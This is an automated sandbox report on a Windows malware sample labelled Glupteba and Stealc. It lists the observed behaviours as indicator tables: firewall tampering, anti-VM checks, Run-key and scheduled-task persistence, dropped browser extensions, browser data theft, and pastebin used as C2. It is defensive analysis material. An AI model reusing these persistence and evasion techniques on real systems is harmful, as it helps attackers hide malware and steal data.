Analysis Overview
SHA256
d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4
Threat Level: Known bad
The file d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4 was found to be: Known bad.
Malicious Activity Summary
Modifies firewall policy service
Stealc
Glupteba
Glupteba payload
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Blocklisted process makes network request
Modifies Windows Firewall
Downloads MZ/PE file
Executes dropped EXE
Checks computer location settings
Drops startup file
UPX packed file
Checks BIOS information in registry
Loads dropped DLL
Reads user/profile data of web browsers
Drops Chrome extension
Drops desktop.ini file(s)
Legitimate hosting services abused for malware hosting/C2
Manipulates WinMonFS driver.
Enumerates connected drives
Checks installed software on the system
Adds Run key to start application
Checks whether UAC is enabled
Looks up external IP address via web service
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Drops file in System32 directory
Checks for VirtualBox DLLs, possible anti-VM trick
Drops file in Program Files directory
Drops file in Windows directory
Launches sc.exe
Unsigned PE
Program crash
Enumerates physical storage devices
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
Creates scheduled task(s)
Enumerates system info in registry
Modifies system certificate store
Suspicious use of FindShellTrayWindow
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Modifies data under HKEY_USERS
Checks SCSI registry key(s)
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-19 14:04
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-19 14:04
Reported
2024-04-19 14:07
Platform
win10v2004-20240412-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies firewall policy service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" | C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe | N/A |
Stealc
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ulc.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ulc.3.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS7625.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\rundll32.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\v1GloRmtlH7A4ZF27q5awSsA.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS7625.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\ulc.3.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LJbRIu2pCVXKEFdMDezjIokn.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uoV9nPqeelROzDnfhz31XMfB.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hRsEISclko0hAwcIoZnJshZC.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DG2z39swRqYzETAkX4aZiJaG.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zhc2O9UdJG2ERo97CDUIVDA0.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\YorvLNmeO6cy0VDWYWpi1XCP.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wViCTUek5N8DiuvPF3ZYQ3ac.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Windows\rss\csrss.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe | N/A |
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe | N/A |
| File opened (read-only) | \??\D: | C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\dfpTsVC.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\dfpTsVC.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2156 set thread context of 2468 | N/A | C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe | N/A |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\ByWuwrOBU\vAeHwP.dll | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File created | C:\Program Files (x86)\RVqmAwyyxwiU2\YCfxMSe.xml | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File created | C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\ZWZyYuD.dll | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File created | C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\rYBRMvB.xml | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File created | C:\Program Files (x86)\DUGaRsFaSnqjC\pbtbGil.dll | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File created | C:\Program Files (x86)\ByWuwrOBU\WUGGbkD.xml | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File created | C:\Program Files (x86)\RVqmAwyyxwiU2\pvwAWeNHfwRPL.dll | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File created | C:\Program Files (x86)\DUGaRsFaSnqjC\aQbGfpM.xml | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| File created | C:\Program Files (x86)\ARTXeDTAxvUn\izroyMN.dll | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\QhciBzJOokLnyYZub.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File opened for modification | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe | N/A |
| File created | C:\Windows\Tasks\bWycNackLSywaqkmgR.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\BAnwxolbGpCzXNxkj.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\qbSDwEgyNYPZlGA.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\ulc.0.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Pictures\v1GloRmtlH7A4ZF27q5awSsA.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\ulc.3.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\ulc.3.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\ulc.3.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS7625.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS7625.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Windows\SysWOW64\rundll32.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time" | C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2571 = "Turks and Caicos Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" | C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" | C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe | N/A |
